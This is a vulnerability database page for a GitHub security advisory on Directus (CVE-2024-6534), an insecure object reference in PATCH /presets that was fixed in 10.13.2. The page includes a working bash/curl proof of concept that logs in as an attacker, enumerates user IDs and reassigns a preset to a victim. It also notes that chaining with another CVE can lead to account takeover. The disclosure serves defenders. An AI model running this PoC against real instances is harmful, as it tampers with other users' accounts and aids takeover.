ghsa-3fff-gqw3-vj86
Vulnerability from github
Published
2024-08-27 19:54
Modified
2025-03-20 18:36
Severity ?
4.1 (Medium) - CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:N/I:L/A:N
Summary
Directus has an insecure object reference via PATH presets
Details

Impact

Directus v10.13.0 allows an authenticated external attacker to modify presets created by the same user to assign them to another user. This is possible because the application only validates the user parameter in the POST /presets request but not in the PATCH request. When chained with CVE-2024-6533, it could result in account takeover.

This vulnerability occurs because the application only validates the user parameter in the POST /presets request but not in the PATCH request.

PoC

To exploit this vulnerability, we need to do the follow steps using a non-administrative, default role attacker account.

  1. Create a preset for a collection.

Store the preset id, or use it if it already exists from GET /presets. The following example will use the direct_users preset.

```bash TARGET_HOST="http://localhost:8055" ATTACKER_EMAIL="malicious@malicious.com" ATTACKER_PASSWORD="123456" root_dir=$(dirname $0) mkdir "${root_dir}/static" curl -s -k -o /dev/null -w "%{http_code}" -X 'POST' "${TARGET_HOST}/auth/login" \ -c "${root_dir}/static/attacker_directus_session_token" \ -H 'Content-Type: application/json' \ -d "{\"email\":\"${ATTACKER_EMAIL}\",\"password\":\"${ATTACKER_PASSWORD}\",\"mode\":\"session\"}" attacker_user_id=$(curl -s -k "${TARGET_HOST}/users/me" \ -b "${root_dir}/static/attacker_directus_session_token" | jq -r ".data.id") # Store all user's id curl -s -k "${TARGET_HOST}/users" \ -b "${root_dir}/static/attacker_directus_session_token" | jq -r ".data[] | select(.id != \"${attacker_user_id}\")" > "${root_dir}/static/users.json"

Choose the victim user id from the previous request

victim_user_id="4f079119-2478-48c4-bd3a-30fa80c5f265" users_preset_id=$(curl -s -k -X 'POST' "${TARGET_HOST}/presets" \ -H 'Content-Type: application/json' \ -b "${root_dir}/static/attacker_directus_session_token" \ --data-binary "{\"layout\":\"cards\",\"bookmark\":null,\"role\":null,\"user\":\"${attacker_user_id}\",\"search\":null,\"filter\":null,\"layout_query\":{\"cards\":{\"sort\":[\"email\"]}},\"layout_options\":{\"cards\":{\"icon\":\"account_circle\",\"title\":\"{{tittle}}\",\"subtitle\":\"{{ email }}\",\"size\":4}},\"refresh_interval\":null,\"icon\":\"bookmark\",\"color\":null,\"collection\":\"directus_users\"}" | jq -r '.data.id') ```

  1. Modify the presets via PATCH /presets/{id}.

With the malicious configuration and the user ID to which you will assign the preset configuration. The user ID can be obtained from GET /users. The following example modifies the title parameter.

bash curl -i -s -k -X 'PATCH' "${TARGET_HOST}/presets/${users_preset_id}" \ -H 'Content-Type: application/json' \ -b "${root_dir}/static/attacker_directus_session_token" \ --data-binary "{\"layout\":\"cards\",\"bookmark\":null,\"role\":null,\"user\":\"${victim_user_id}\",\"search\":null,\"filter\":null,\"layout_query\":{\"cards\":{\"sort\":[\"email\"]}},\"layout_options\":{\"cards\":{\"icon\":\"account_circle\",\"title\":\"PoC Assign another users presets\",\"subtitle\":\"fakeemail@fake.com\",\"size\":4}},\"refresh_interval\":null,\"icon\":\"bookmark\",\"color\":null,\"collection\":\"directus_users\"}"

Notes:

Each new preset to a specific collection will have an integer consecutive id independent of the user who created it.

The user is the user id of the victim. The server will not validate that we assign a new user to a preset we own.

The app will use the first id preset with the lowest value it finds for a specific user and collection. If we control a preset with an id lower than the current preset id to the same collection of the victim user, we can attack that victim user, or if the victim has not yet defined a preset for that collection, then the preset id could be any value we control. Otherwise, the attacker user must have permission to modify or create the victim presets.

When the victim visits the views of the modified presets, it will be rendered with the new configuration applied.

Show details on source website

To clipboard 

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 10.13.1"
      },
      "package": {
        "ecosystem": "npm",
        "name": "directus"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "10.13.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2024-6534"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-639"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2024-08-27T19:54:29Z",
    "nvd_published_at": null,
    "severity": "MODERATE"
  },
  "details": "### Impact\nDirectus v10.13.0 allows an authenticated external attacker to modify presets created by the same user to assign them to another user. This is possible because the application only validates the user parameter in the `POST /presets` request but not in the PATCH request. When chained with [CVE-2024-6533](https://github.com/directus/directus/security/advisories/GHSA-9qrm-48qf-r2rw), it could result in account takeover.\n\nThis vulnerability occurs because the application only validates the user parameter in the `POST /presets` request but not in the PATCH request.\n\n### PoC\nTo exploit this vulnerability, we need to do the follow steps using a non-administrative, default role attacker account.\n\n1. Create a preset for a collection.\n\nStore the preset id, or use it if it already exists from `GET /presets`. The following example will use the direct_users preset.\n\n```bash\nTARGET_HOST=\"http://localhost:8055\" ATTACKER_EMAIL=\"malicious@malicious.com\" ATTACKER_PASSWORD=\"123456\" root_dir=$(dirname $0) mkdir \"${root_dir}/static\" curl -s -k -o /dev/null -w \"%{http_code}\" -X \u0027POST\u0027 \"${TARGET_HOST}/auth/login\" \\ -c \"${root_dir}/static/attacker_directus_session_token\" \\ -H \u0027Content-Type: application/json\u0027 \\ -d \"{\\\"email\\\":\\\"${ATTACKER_EMAIL}\\\",\\\"password\\\":\\\"${ATTACKER_PASSWORD}\\\",\\\"mode\\\":\\\"session\\\"}\" attacker_user_id=$(curl -s -k \"${TARGET_HOST}/users/me\" \\ -b \"${root_dir}/static/attacker_directus_session_token\" | jq -r \".data.id\") # Store all user\u0027s id curl -s -k \"${TARGET_HOST}/users\" \\ -b \"${root_dir}/static/attacker_directus_session_token\" | jq -r \".data[] | select(.id != \\\"${attacker_user_id}\\\")\" \u003e \"${root_dir}/static/users.json\"\n\n# Choose the victim user id from the previous request\nvictim_user_id=\"4f079119-2478-48c4-bd3a-30fa80c5f265\"\nusers_preset_id=$(curl -s -k -X \u0027POST\u0027 \"${TARGET_HOST}/presets\" \\\n  -H \u0027Content-Type: application/json\u0027 \\\n  -b \"${root_dir}/static/attacker_directus_session_token\" \\\n  --data-binary \"{\\\"layout\\\":\\\"cards\\\",\\\"bookmark\\\":null,\\\"role\\\":null,\\\"user\\\":\\\"${attacker_user_id}\\\",\\\"search\\\":null,\\\"filter\\\":null,\\\"layout_query\\\":{\\\"cards\\\":{\\\"sort\\\":[\\\"email\\\"]}},\\\"layout_options\\\":{\\\"cards\\\":{\\\"icon\\\":\\\"account_circle\\\",\\\"title\\\":\\\"{{tittle}}\\\",\\\"subtitle\\\":\\\"{{ email }}\\\",\\\"size\\\":4}},\\\"refresh_interval\\\":null,\\\"icon\\\":\\\"bookmark\\\",\\\"color\\\":null,\\\"collection\\\":\\\"directus_users\\\"}\"  | jq -r \u0027.data.id\u0027)\n```\n\n2. Modify the presets via `PATCH /presets/{id}`.\n\nWith the malicious configuration and the user ID to which you will assign the preset configuration. The user ID can be obtained from `GET /users`. The following example modifies the title parameter.\n\n```bash\ncurl -i -s -k -X \u0027PATCH\u0027 \"${TARGET_HOST}/presets/${users_preset_id}\" \\\n    -H \u0027Content-Type: application/json\u0027 \\\n    -b \"${root_dir}/static/attacker_directus_session_token\" \\\n    --data-binary \"{\\\"layout\\\":\\\"cards\\\",\\\"bookmark\\\":null,\\\"role\\\":null,\\\"user\\\":\\\"${victim_user_id}\\\",\\\"search\\\":null,\\\"filter\\\":null,\\\"layout_query\\\":{\\\"cards\\\":{\\\"sort\\\":[\\\"email\\\"]}},\\\"layout_options\\\":{\\\"cards\\\":{\\\"icon\\\":\\\"account_circle\\\",\\\"title\\\":\\\"PoC Assign another users presets\\\",\\\"subtitle\\\":\\\"fakeemail@fake.com\\\",\\\"size\\\":4}},\\\"refresh_interval\\\":null,\\\"icon\\\":\\\"bookmark\\\",\\\"color\\\":null,\\\"collection\\\":\\\"directus_users\\\"}\"\n```\n\nNotes:\n\nEach new preset to a specific collection will have an integer consecutive id independent of the user who created it.\n\nThe user is the user id of the victim. The server will not validate that we assign a new user to a preset we own.\n\nThe app will use the first id preset with the lowest value it finds for a specific user and collection. If we control a preset with an id lower than the current preset id to the same collection of the victim user, we can attack that victim user, or if the victim has not yet defined a preset for that collection, then the preset id could be any value we control. Otherwise, the attacker user must have permission to modify or create the victim presets.\n\nWhen the victim visits the views of the modified presets, it will be rendered with the new configuration applied.",
  "id": "GHSA-3fff-gqw3-vj86",
  "modified": "2025-03-20T18:36:04Z",
  "published": "2024-08-27T19:54:29Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/directus/directus/security/advisories/GHSA-3fff-gqw3-vj86"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-6534"
    },
    {
      "type": "WEB",
      "url": "https://directus.io"
    },
    {
      "type": "WEB",
      "url": "https://fluidattacks.com/advisories/capaldi"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/directus/directus"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:N/I:L/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Directus has an insecure object reference via PATH presets"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
  • Confirmed: The vulnerability is confirmed from an analyst perspective.
  • Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
  • Patched: This vulnerability was successfully patched by the user reporting the sighting.
  • Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
  • Not confirmed: The user expresses doubt about the veracity of the vulnerability.
  • Not patched: This vulnerability was not successfully patched by the user reporting the sighting.